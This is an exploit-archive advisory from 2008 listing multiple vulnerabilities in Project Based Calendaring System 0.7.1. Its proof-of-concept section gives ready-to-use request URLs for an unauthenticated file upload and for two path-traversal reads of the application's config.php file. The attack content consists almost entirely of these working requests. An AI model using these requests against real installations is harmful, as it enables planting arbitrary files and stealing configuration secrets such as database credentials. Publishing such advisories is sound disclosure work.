[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Project Based Calendaring System (PBCS) 0.7.1 Multiple Vulnerabilities
# Published : 2008-04-30
# Author : GoLd_M
# Previous Title : 5th Avenue Shopping Cart (category_ID) SQL Injection Vulnerability
# Next Title : OxYProject 0.85 (edithistory.php) Remote Code Execution Vulnerability
Project Based Calendaring System (PBCS) Version 0.7.1 Multiple Vulnerabilities
Script: http://www.pbcs.org/pbcs_download.php
Poc :
Hi str0ke Thanx To Posted but I Want Add Some Vulns In This Script
1- remote file upload
http://localhost/pbcs-0.7.1-1/src/yopy_upload.php
after upload you can get you file on
http://localhost/pbcs-0.7.1-1//tmp/uploads/name your file
2- remote file disclosure
http://localhost/pbcs-0.7.1-1/src/yopy_sync.php?download_file=0&filename=../config/config.php
3- file disclosure
/plugins/system-logger/print_logs.php?filename=../../config/config.php
# www.Syue.com [2008-04-30]